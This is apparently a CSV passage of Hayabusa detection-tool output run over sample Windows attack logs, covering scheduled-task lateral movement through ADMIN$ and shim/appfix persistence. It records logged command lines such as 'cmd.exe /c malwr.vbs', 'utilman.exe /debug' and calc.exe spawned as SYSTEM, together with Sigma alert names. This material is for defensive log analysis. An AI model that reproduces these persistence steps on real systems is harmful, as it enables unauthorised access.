+09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP 
Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : 
IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
\SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 
ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: 
C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: 
C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.419 